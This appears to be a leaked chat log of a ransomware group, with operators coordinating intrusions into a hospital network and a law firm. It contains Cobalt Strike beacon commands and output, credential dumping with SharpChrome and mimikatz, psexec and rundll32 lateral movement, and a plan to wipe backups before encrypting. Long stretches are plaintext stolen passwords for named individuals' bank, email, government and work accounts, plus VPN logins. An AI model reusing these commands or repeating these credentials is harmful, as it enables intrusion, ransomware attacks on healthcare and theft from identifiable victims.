if you leave a session on the dll, it won't crash if you don't have a way to do it by the way it's accepted.
if you leave it on the dll - it crashes after a few hours
while these are observations) I checked on a couple of servers - there was no reboot, but the session fellaprobesthe next time, as you restore the session, look how long the computer is running, something like this:
` `(Get-Date (Get-Process explorer).StartTime).ToString('yyyyyMMdd')[ ](http://wfy76wigkpoxqbe6.onion/group/cobalt_v42_patched?msg=xu2Q4qYAAed7PbQ7S) As I understand it separately in some networks, apparently something at the hardware level, I had 2 times, on several machines in 2 networks ... but perhaps, as noted - was restarting servers, I did not watch the life of a computer[ ](https://stylebrooks.com/group/cobalt_v42_patched?msg=3Fe4AGJ8mLf4nfGnm) was like this, when the big slip put for 10 minutes from hibernation mode returns. on vorkstantsyayut meet, servaki usually resetatumiret, she is in memory but the technologist asks about anotherRead after restart your session should die?) as a follow-up question - how to remove the jitter 300 seconds? fuckin' randomly lead sessions to the slip - after 3-4 hours the session crashes Anybody else has to deal with massive crash sessions at night for no reason?ICt only that here@barabulkaVanoprince@alter @prince add yuzalgeoblok quite probable or not enabled windef or geoblok@all help please who faced this problem, my partner on another server logs in, I have the same creed - the error if you have not set PATH then just go to C:\users\administrator\ubuntu\ and run ubuntu.exe
that's it, you are in the terminal, you can do sudo apt update =)guys, very useful thing, in fact you have two axes on one dedicap, handy for work under the vpn
terminal linux in winds, need 2019 server
```
===
we need windows server 2019+
1. run poower shell as administrator and type:
> Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
2. Download linux subsystem distro from: https://docs.microsoft.com/en-us/windows/wsl/install-manual
like:
kali: https://aka.ms/wsl-kali-linux-new
ubuntu18.04: https://aka.ms/wsl-ubuntu-1804
ubuntu20.04: https://aka.ms/wslubuntu2004
debian: https://aka.ms/wsl-debian-gnulinux
Open poowershell and extract files from appx like:(Ubuntu -> changed_name)
copy .appx downloaded file to C:\Users\Administrator and go to the this folder in pwsh
> Rename-Item .\Ubuntu.appx .\Ubuntu.zip
> Expand-Archive .\Ubuntu.zip .\Ubuntu
> cd kali
4. Run Ubuntu.exe
5. Add your distro path to the Windows environment PATH (C:\Users\Administrator\Ubuntu in this example), using PowerShell:
$userenv = [System.Environment]::GetEnvironmentVariable("Path", "User")
[System.Environment]::SetEnvironmentVariable("PATH", $userenv + ";C:\Users\Administrator\Ubuntu", "User")
!1/ if you dont have exe in your folder, check these steps with another distro
!2/ Installation failed with error 0x8007007e: If you receive this error, then your system doesn't support WSL. Ensure that you're running Windows build 16215 or later. Check your build. Also check to confirm that WSL is enabled and your computer was restarted after the feature was enabled.
``````execute-assembly /home/user/soft/scripts/SharpChrome.exe logins /showall
``---Alternative from under the coba :
```mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
``Hi.
who used SharpChrome, could you please share the manual? and all the data there and add me there create a new channel there how to transfer@alex transfer to a new rocket?i already tried a million variations and still nothing lezzhodithey by web domain some removed home bluepathfinance with domain goodvibsi they removed the form "5baftI06a0yitk0SBmQh4T1mip01shZTHVdUPyxDYN0= 1 jkinnen Fordo55! goodvibes "even though they're exactly right because they took off the same ones the second one will write incorrectlyesonix neither through extender nor through web doesn't want to accept passwordsneeded opinionchekaju@alex zaletayos spsraz tvinovskaya diedbinari on cobu eira have? hi+1+ )@steven, bro sit without delav processem? What command can I export cookies in JSON format through execute-assembly? on sharpchrome or something similar@all who has sharpPrintNightmare RCE started?
```
3MCDIDAT.main.crispregional.org
Allscripts_PM.main.crispregional.org
ATComm.main.crispregional.org
Bepoz.main.crispregional.org
Cintas.main.crispregional.org
CorepointApp01.main.crispregional.org
CorepointApp02.main.crispregional.org
CorepointTest.main.crispregional.org
CRHS-Dragon.main.crispregional.org
CRHS-PRINT.main.crispregional.org
crhs-security.main.crispregional.org
CRHSBACKUP.main.crispregional.org
CRHSvCenter.main.crispregional.org
CRHSViewCon02.main.crispregional.org
CRHSViewExtCon.main.crispregional.org
CRHSViewTS4.main.crispregional.org
CRHSViewTS5.main.crispregional.org
CRHSViewTS6.main.crispregional.org
CRRHPUMP1.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRRHPUMP3.main.crispregional.org
HISCODER.main.crispregional.org
HPDeviceManager.main.crispregional.org
HRBADGE.main.crispregional.org
Intranet.main.crispregional.org
Intranet.main.crispregional.org
IT-ADMIN.main.crispregional.org
IT-Info.main.crispregional.org
Syslog.main.crispregional.org
Lansweeper.main.crispregional.org
MedManager.main.crispregional.org
MedNet.main.crispregional.org
NEXO.main.crispregional.org
NovaNet.main.crispregional.org
ProvationApp.main.crispregional.org
ProvationDB.main.crispregional.org
PYXIS-APP.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-DB.main.crispregional.org
PYXIS-RPT.main.crispregional.org
PyxisPharmLive.main.crispregional.org
QMS.main.crispregional.org
ScriptSvr01.main.crispregional.org
SPFoundation.main.crispregional.org
TELCOR.main.crispregional.org
Trinisys-APP.main.crispregional.org
Trinisys-DB.main.crispregional.org
``Let's take our time to prepare and close down little by little, how much is that? Well, shall we start little by little? https://www.lets-talk-about.tech/2018/03/rubrik-reset-brik-to-factory-default.htmlпроверяем) it's a little early[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=bYvaQAP93d3DLXhm6) 206.221.188.106:38824then close down little by little, the servers are still being restored via rubrik
I propose to reset the passwords on the cx, erase rubric and encrypt all over again
They restore everything from it, and the storage of backups there too
but there's a problem in the form of ``
anti_ransom.exe
``` - put on some servers.
seems to bite, cuts the launch dll.
the idea is to go around the rdp and remove or disconnect the rest of the televisa last session fell off today - tv, yesterday's nets from the vpn and the current @user3[ ](https://mediaeveryone.com/channel/general?msg=gCK9C9WQDpE52k8pR) Well, just ate lunch rolls.the question was where are we wasting our time in general, I'm not talking about this network in a network where 21k npc are the quietest waysshaprhoud\accesses to shampeople\shaprhoud\accesses to shampeople\gather comps and servers where to bruteforce on lato tell me differentlywhat other info are you spending time while hell is gathering?) did not have time (rubeus I always run after collecting information + where are the hashes? manually gather would be quieterwhy tulchaindomainDKnu always started with this (YES LA EA adinfo) the question is why the fuck do I know that this from tulchainaand I know what or how it is connected, but after the adfind finished files and the archive began downloading the session died Why use it?
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
333301283
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
398533948
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
437262015
``Why is it definitely dead now (-from mathem.local there are still live sessions? It's too big if you work with it don't fuck it up``.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
bbt0097 reconwindomp suQARSp_admin
suWATprod
The command completed successfully.
``I spammed a new one, try it yourself there is only 1 session at all do any command and dies spamming session banally ask YES and the session dies everything is bad, just terrible, does not give anything to do all who have problems go to this coboo and work from there ``
flexzap.com
``````
192.254.78.106:30504
sUSsQS7WpevaVL12GSMXs8Z10cXXski8ins
``cannot use eleveits@tl1
In the new coba from the user does not give anything to do
```
[-] could not spawn C:\WINDOWS\sysnative\wusa.exe: 740
[-] Could not connect to pipe: 2
``hi:space_invader:HiHiHiHiHi, there was one this morning
anyone still have the files? you need to know how to do this.
it's the only method to dump chrome without a session on the machine we dumped the masterkey, and it's not coming, so we're trying to dump the masterkey with the file
It's not like it's a backup, huh?
I wonder what clupload has to do with it... Whatever, so do it.
and offline solved the problem I threw how to pull chrome through DPAPI found a polzak masterkey that goes to malwarenu to decrypt the DPAPI content chrome in sharp chrome master-key can somehow work? maybe from it a folder OutLook I don't know
it doesn't say anything...and sitbell search for credentials came up login credentials.jpg
```
C:\Users\johni\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\58CKFMPE
What is this and where does it come from? Search for cloud storage access further in the browserswhich software accesses these cloudsand then find out what it is and understand what it is
NAS/network hardware or what see what admin is hanging out there and blow on the 80/443 ports
to figure out what's up with the host already i'm thinking how the hell it was!!!!!!!!!```
it's on d
```
ls \hostname\d$
gives an output or what?
I do not know how to comment on the attempt to copy inaccessible dira
what to do in this case is obvious in my opinion, sorry it's all open ports3389 can be checked
in hell you can check what axis is still open? if the drive C does not exist - there can only be one fucking obvious assumption) it's not even an error to correct you somewhere you try to copy the file to a non-existent dira I do not know what to add you are so verbose ...
(ICMP) Target '192.168.100.97' is alive. [read 8 bytes]
[+] received output:
192.168.100.97:443
[+] received output:
192.168.100.97:80
192.168.100.97:22 (SSH-2.0-dropbear_2014.63)
``Scan to everything''.
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 01:00:27> shell dir \\desktop-33jh80d.sprouselaw.com\c$
[*] Tasked beacon to run: dir \\desktop-33jh80d.sprouselaw.com\c$
[+] host called home, sent: 70 bytes
[+] received output:
The network path was not found.
``22shell dir \\desktop-33jh80d.sprouselaw.com\c$already tried445 which ports can be scanned?
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:58:27> shell net view \\desktop-33jh80d.sprouselaw.com
[*] Tasked beacon to run: net view \desktop-33jh80d.sprouselaw.com
[+] host called home, sent: 72 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
```
same kind of ballyhoo then so yeah.
Name: desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97
```
that's his host, the one you threw in is DK
\zion.sprouselaw.com
``but try the hostname``
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:49:54> shell net view \\\192.168.100.97
[*] Tasked beacon to run: net view \\192.168.100.97
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:53:59> shell ping 192.168.100.97 -n 1
[*] tasked beacon to run: ping 192.168.100.97 -n 1
[+] host called home, sent: 55 bytes
[+] received output:
Pinging 192.168.100.97 with 32 bytes of data:
Reply from 192.168.100.97: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.100.97:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:54:48> shell nslookup 192.168.100.97
[*] Tasked beacon to run: nslookup 192.168.100.97
[+] host called home, sent: 54 bytes
[+] received output:
Server: zion.sprouselaw.com
Address: 192.168.100.240
Name: desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97
```
I don't know what to do, there is no view on the host/ipnu scan to the win ports How can you check this? I'm not sure of anything in life so how do you copy to a folder you can't see? are you sure it's a win machine? @user8 from any machine as long as the machine sees all domain controllers
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:06> ls \\\192.168.100.97\C$\
[*] Tasked beacon to list files in \\192.168.100.97\C$\
[+] host called home, sent: 37 bytes
[-] could not open \192.168.100.97\C$\*: 53
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:50> ls \\192.168.100.97\C$\ProgramData
[*] Tasked beacon to list files in \192.168.100.97\C$\ProgramData
[+] host called home, sent: 49 bytes
[-] could not open \192.168.100.97\C$\ProgramData\*: 53
Sure it works on any machine or is it better with the DK? Is the folder accessible? And with ls \192.168.100.97\C$\ProgramData@tl2
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:41:13> shell copy C:\ProgramData\updates.dll \\\192.168.100.97\C$\ProgramData\
[*] Tasked beacon to run: copy C:\ProgramData\updates.dll \\192.168.100.97\$\ProgramData\
[+] host called home, sent: 95 bytes
[+] received output:
The network path was not found.
0 file(s) copied.
``@user7 for what reason? What failed?
192.168.100.238
```
+
I connected and it just froze, then I couldn't get the dll on it
192.168.100.97 -
192.168.100.98 -
192.168.100.99 -
192.168.100.94 -
192.168.100.95 -
```
couldn't get on these machineshttp://habr.com/ru/post/434514/`Mitel/192.168.100.235twd/jyhu\judy sprouse350```Mitel/192.168.100.235twd/ccolumbus\christinec changeme````
How to use VPN
1. Double-click the VPN icon on the Desktop
Skip (2. Double-click 38.68.2.51)
Enter username JeffH (case sensitive)
4. Enter password Sprouse20!
5. click OK
---------------
6. When finished, right-click 38.68.2.51 > click Disable
7. Close the VPN window.
````Mitel/192.168.100.235twd/tirion\terry Terry1`Mitel/192.168.100.235/cmogonye\courtney changeme` on DA computer installed PasswordsPlus`Mitel/192.168.100.235/redwards\reva sss3500rbe````
URL : https://www.heb.com/myaccount/login.jsp
Username : susan.hillyer@sprouselaw.com
Password : shSprouse2019
--- Chromium Credential (User: susanh) ---
URL : https://www.tbls.org/
Username : 17408600
Password : barons26
--- Chromium Credential (User: susanh) ---
URL : https://web1.zixmail.net/s/setup
Username : susan.hillyer@sprouselaw.com
Password : Sprouse2020
--- Chromium Credential (User: susanh) ---
URL : https://www.adr.org/aaa/faces/register
Username : SprouseVictoria
Password : Sprouse2020
--- Chromium Credential (User: susanh) ---
URL : https://apps.adr.org/AAAApp/faces/login.jsf
Username : SprouseVictoria
Password : Sprouse2020
--- Chromium Credential (User: susanh) ---
URL : https://ep4.ingeo.com/Login.aspx
Username : sprouselaw34
Password : Sprouse2020sh
````Mitel/192.168.100.235twd/shillyer\susanh Sprouse2016SH````
--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : Br2020$
--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : barons26
--- Chromium Credential (User: bill) ---
URL :
Username : B3M205
Password : Iw$500fa
--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL :
Username : barons26@yahoo.com
Password : 202020
--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : iw$500fcr
--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : 202020
--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : barons26
--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : br202020
--- Chromium Credential (User: bill) ---
URL :
Username : RJ6STJ4
Password : barons26
--- Chromium Credential (User: bill) ---
URL :
Username : RJ6STJ4
Password : barons26
--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb
--- Chromium Credential (User: bill) ---
URL :
Username : russell@suddenlinkmail.com
Password : br202020
--- Chromium Credential (User: bill) ---
URL :
Username : 16493982
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : fffF666^
--- Chromium Credential (User: bill) ---
URL :
Username : 349281159
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : 20202020
--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : 202020
--- Chromium Credential (User: bill) ---
URL :
Username : Barons26
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL :
Username : 5129451807
Password : Barons26
--- Chromium Credential (User: bill) ---
URL :
Username : Mallarae
Password : Henry1776
--- Chromium Credential (User: bill) ---
URL :
Username : Mallarae
Password : Henry1776
--- Chromium Credential (User: bill) ---
URL :
Username : bill
Password : Sprouse2013BR
--- Chromium Credential (User: bill) ---
URL :
Username : 17408600
Password : barons26
--- Chromium Credential (User: bill) ---
URL :
Username : 17408600
Password : barons26
--- Chromium Credential (User: bill) ---
URL :
Username : BILL.RUSSELL@SPROUSELAW.COM
Password : 20202020
--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : *****172
Password : Iw$500fual
--- Chromium Credential (User: bill) ---
URL : https://www.united.com/web/en-US/apps/sso/Login.aspx
Username : DT435172
Password : Iw$500fual
--- Chromium Credential (User: bill) ---
URL :
Username : KITEMINI
Password : Iw$500fusaa
--- Chromium Credential (User: bill) ---
URL :
Username : RUS1184105
Password : 202020
--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : barons26
Password : baron$26
--- Chromium Credential (User: bill) ---
URL : https://www.oceaniacruises.com/cruise-finder/
Username : bill.russell@sprouselaw.com
Password : 202020
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL : https://signin.lexisnexis.com/lnaccess/Transition
Username : barons26
Password : fffF666^
--- Chromium Credential (User: bill) ---
URL : https://www.earthpoint.us/SignIn.aspx
Username : jbrrussell@suddenlink.net
Password : br202020
--- Chromium Credential (User: bill) ---
URL : https://sso.accounts.dowjones.com/login
Username : barons26
Password : 202020
--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : DT435172
Password : Iw$500fual
--- Chromium Credential (User: bill) ---
URL : https://www.oceaniacruises.com/login/
Username : bill.russell@sprouselaw.com
Password : 202020
--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349281159
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://www.att.com/my/
Username : jbrrussell@me.com
Password : Iw$500fatt
--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/
Username : 9350391968
Password : Iw$500fd
--- Chromium Credential (User: bill) ---
URL : https://www.aopa.org/login/Default/index.cfm
Username : barons26
Password : barons26
--- Chromium Credential (User: bill) ---
URL : https://secure.classmates.com/auth/login
Username : barons26@yahoo.com
Password : 202020
--- Chromium Credential (User: bill) ---
URL : https://outlook.sprouselaw.com/owa/auth.owa
Username : bill
Password : Sprouse2013BR
--- Chromium Credential (User: bill) ---
URL : https://www.tbls.org/MyTBLS/Login.aspx
Username : 17408600
Password : barons26
--- Chromium Credential (User: bill) ---
URL : https://www.avis.com/en/
Username : B3M205
Password : Iw$500fa
--- Chromium Credential (User: bill) ---
URL : https://www.veteransadvantage.com/vauser3/auth2/process
Username : RUS1184105
Password : 202020
--- Chromium Credential (User: bill) ---
URL : https://www.nutrisystem.com/jsp/myaccount/login/login.jsp
Username : jbrrussell@suddenlink.net
Password : 20202020
--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/
Username : barons26a
Password : usafa1978
--- Chromium Credential (User: bill) ---
URL : https://www.texasbarcle.com/cle/AALookupPassword.asp
Username : BILL.RUSSELL@SPROUSELAW.COM
Password : 20202020
--- Chromium Credential (User: bill) ---
URL : https://enroll.schwab.com/AoUI/
Username : Mallarae
Password : Henry1776
--- Chromium Credential (User: bill) ---
URL : https://www.facebook.com/login/device-based/regular/login/
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb
--- Chromium Credential (User: bill) ---
URL : https://legacy.enterprise.com/car_rental/enterprisePlusLoginWidget.do
Username : RJ6STJ4
Password : barons26
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL : https://www.dropbox.com/ajax_login
Username : bill.russell@sprouselaw.com
Password : barons26
--- Chromium Credential (User: bill) ---
URL : https://www.dropbox.com/ajax_login
Username : bill.russell@sprouselaw.com
Password : barons26
--- Chromium Credential (User: bill) ---
URL : https://ec.consumerreports.org/ec/cro/sem/login.htm
Username : jbrrussell@suddenlink.net
Password : iw$500fcr
--- Chromium Credential (User: bill) ---
URL : https://login.optumbank.com/CAP/Portlets/login.jsf
Username : Barons26
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://www.americanbar.org/auth/login/
Username : bill.russell@sprouselaw.com
Password : Br2020$
--- Chromium Credential (User: bill) ---
URL : https://flightaware.com/account/session
Username : russell@suddenlinkmail.com
Password : br202020
--- Chromium Credential (User: bill) ---
URL : https://www.texasbar.com/AM/Template.cfm
Username : 17408600
Password : barons26
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL : https://www.enterprise.com/en/home.html
Username : RJ6STJ4
Password : barons26
--- Chromium Credential (User: bill) ---
URL : https://www.paygonline.com/websc/logon.html
Username : 5129451807
Password : Barons26
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp
--- Chromium Credential (User: bill) ---
URL : https://www.hertz.com/rentacar/reservation/
Username : 16493982
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://www.enterprise.com/en/home.html
Username : RJ6STJ4
Password : barons26
--- Chromium Credential (User: bill) ---
URL : https://www.usaa.com/inet/ent_logon/j_security_check
Username : KITEMINI
Password : Iw$500fusaa
--- Chromium Credential (User: bill) ---
URL : https://www.facebook.com/login/device-based/regular/login/
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb
--- Chromium Credential (User: bill) ---
URL : https://lms.schwab.com/Login
Username : Mallarae
Password : Henry1776
--- Chromium Credential (User: bill) ---
URL : https://www.celebritycruises.com/
Username : jbrrussell
Password : br2020
--- Chromium Credential (User: bill) ---
URL : https://chaseonline.chase.com/Logon.aspx
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/custlogin/login.action
Username : 9350391968
Password : Iw$500fd
--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/custlogin/login.action
Username : 9350391968
Password : Iw$500fd
--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : *****172
Password : Iw$500fual
--- Chromium Credential (User: bill) ---
URL : https://onlinebanking.bankofoklahoma.com/Login/SubmitLogin
Username : bervjr
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp
--- Chromium Credential (User: bill) ---
URL : https://www.amazon.com/ap/signin
Username : barons26@yahoo.com
Password : 202020
--- Chromium Credential (User: bill) ---
URL : https://us1.proofpointessentials.com/app/login.php
Username : bill.russell@sprouselaw.com
Password : 20202020
--- Chromium Credential (User: bill) ---
URL : https://www.celebritycruises.com/account/signin
Username : jbrrussell@suddenlink.net
Password : barons26
--- Chromium Credential (User: bill) ---
URL : https://www.ups.com/lasso/login
Username : jbrrussell
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://onlinebanking.bankofoklahoma.com/login/loginsubmit
Username : bervjr
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://web1.zixmail.net/s/register
Username : bill.russell@sprouselaw.com
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349******
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://app.mt.gov/epass-idp/Authn/EpassCreate/
Username : mallarae
Password : 32mallarae
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp
--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349******
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://securemail.americanmomentum.bank/s/register
Username : bill.russell@sprouselaw.com
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : barons26@gmail.com
Password : dtjyqh32
--- Chromium Credential (User: bill) ---
URL : https://mobile.usaa.com/inet/ent_logon/j_security_check
Username : KITEMINI
Password : Iw$500fusaa
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : 45583567
Password : Iw2019fmpe
--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : russell@suddenlinkmail.com
Password : iw$500fg
--- Chromium Credential (User: bill) ---
URL : https://healthsafeid.optumbank.com/
Username : Barons26
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://www.trade-a-plane.com/user-signup/create_account
Username : barons26
Password : 20202020
--- Chromium Credential (User: bill) ---
URL : https://www.insurancelawsection.org/documents/state-farm-lloyds-v-fuentes-2/
Username : bill.russell@sprouselaw.com
Password : SKk)COlOBuWf
--- Chromium Credential (User: bill) ---
URL : https://www.sandhillslogin.com/account/Signin
Username : bill.russell@sprouselaw.com
Password : Iw$500fc
--- Chromium Credential (User: bill) ---
URL : javascript:;
Username : bluemini
Password : Iw$2020fh
--- Chromium Credential (User: bill) ---
URL : https://login.celebrations.com/login
Username : bill.russell@sprouselaw.com
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://www.fedex.com/apps/fdmenrollment/
Username : barons26
Password : baron$26
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : ba****26
Password : iw$520fmp
--- Chromium Credential (User: bill) ---
URL :
Username : russell
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://securemail.zionsbancorp.com/securereader/registration.jsf
Username : russell
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://secure.consumerreports.org/ec/inputNewPasswordForm
Username : jbrrussell@suddenlink.net
Password : iw$500fcr
--- Chromium Credential (User: bill) ---
URL : https://www.ancestry.com/checkout/MLI
Username : bill.russell@sprouselaw.com
Password : 20202020
--- Chromium Credential (User: bill) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : jbrrussell@me.com
Password : Iw$500fatt
--- Chromium Credential (User: bill) ---
URL : https://securemail.simmonsfirst.com/securereader/registration.jsf
Username : bill
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : bill.russell@sprouselaw.com
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : javascript:;
Username : russell
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://app.farmlogs.com/
Username : 3615789943
Password : 20202020
--- Chromium Credential (User: bill) ---
URL : https://secure.ssa.gov/RIL/Si.action
Username : JBRRUSSELL
Password : Baron$26
--- Chromium Credential (User: bill) ---
URL : https://www.americanbar.org/auth/login/
Username : bill.russell@sprouselaw.com
Password : Br2020$
--- Chromium Credential (User: bill) ---
URL : https://auth.veteransadvantage.com/signinform
Username : RUS1184105
Password : 202020
--- Chromium Credential (User: bill) ---
URL : https://flightaware.com/account/manage
Username : bill.russell@sprouselaw.com
Password : br202020
--- Chromium Credential (User: bill) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : barons26@gmail.com
Password : mallarae32
--- Chromium Credential (User: bill) ---
URL : https://www.wyndhamhotels.com/wyndham-rewards/first-time-sign-in
Username : barons26
Password : baron$26
--- Chromium Credential (User: bill) ---
URL : https://login.fidelity.com/ftgw/Fas/Fidelity/NBPart/CreateUsernamePwd/Create/dj.chf.ra
Username : mallarae32
Password : 32wgrannis
--- Chromium Credential (User: bill) ---
URL : https://nb.fidelity.com/ftgw/Fas/Fidelity/PWI/Login/Response/dj.chf.ra/
Username : mallarae32
Password : 32wgrannis
--- Chromium Credential (User: bill) ---
URL : https://www.eftps.gov/eftps/taiLoginAttempt
Username : 2732058
Password : Tri2020$2020
--- Chromium Credential (User: bill) ---
URL : https://www.alltrails.com/signup
Username : bill.russell@sprouselaw.com
Password : 20202020
````Mitel/192.168.100.235/brussell\SPROUSELAW\bill changeme`@user9 well if you can see the login there - it makes sense to try any other creds with the login of this polzak+Does it start without comma?
remote-exec psexec 192.168.100.103 rundll32 C:\ProgramData\1580759637.bdinstall.dll entryPoint
shell copy 1580759637.bdinstall.dll \\\192.168.100.103\C$\ProgramData\
Look for notes from this username@tl2 found a computer where the admin goes to https://cloud.malwarebytes.com/
but it won't unlock the chrome credentials.
tried with dpapi:chrome and sharpchrome
prints out empty passwords.
--- Chromium Credential (User: douglas) ---
URL : https://tx.countygovernmentrecords.com/texas/web/loginPOST.jsp;jsessionid=3AF15044DA2A27D57AED078F8544455B
Username : douglas.brooking@sprouselaw.com
Password : Sprouse2019
--- Chromium Credential (User: douglas) ---
URL : https://www.texasfile.com/login/
Username : taylor.kelley@sprouselaw.com
Password : Gorebels1856
--- Chromium Credential (User: douglas) ---
URL : https://direct.sos.state.tx.us/acct/acct-login.asp
Username : 10245062
Password : sprouse2017
--- Chromium Credential (User: douglas) ---
URL : https://unitedhealthcaremotion.com/Home/LoginPartial
Username : douglas.brooking@sprouselaw.com
Password : Natwwal1214!
--- Chromium Credential (User: douglas) ---
URL : https://www.myuhc.com/member/prewelcome.do
Username :
Password : Natwwal1214!
--- Chromium Credential (User: douglas) ---
URL : https://us1.proofpointessentials.com/app/login.php
Username : douglas.brooking@sprouselaw.com
Password : Natwwal1214!
--- Chromium Credential (User: douglas) ---
URL : https://pacer.login.uscourts.gov/csologin/login.jsf
Username : Sprouse0124
Password : Ogitj@2020
--- Chromium Credential (User: douglas) ---
URL : https://www.texasbarcle.com/cle/AALookupPassword.asp
Username : doug.brooking@sprouselaw.com
Password : Natwwal1214
--- Chromium Credential (User: douglas) ---
URL : https://www.sos.ok.gov/client/cLoginRegistration.aspx
Username : brooking
Password : Sprouse2019
--- Chromium Credential (User: douglas) ---
URL : https://pcl.uscourts.gov/pcl/index.jsf
Username : Sprouse0124
Password : Ogitj@2020
--- Chromium Credential (User: douglas) ---
URL : http://www.oilgas.org/EmailPassword.aspx
Username : DBrooking05
Password : 24110605
--- Chromium Credential (User: douglas) ---
URL : https://my.voya.com/voyasso/index.html
Username : brookingd
Password : Natwwal1214!
--- Chromium Credential (User: douglas) ---
URL : https://www.aa.com/loyalty/login/submit
Username : 83JC1X6
Password : Natwwal1214
--- Chromium Credential (User: douglas) ---
URL : https://www.delta.com/
Username : 9478151385
Password : Natwwal1214
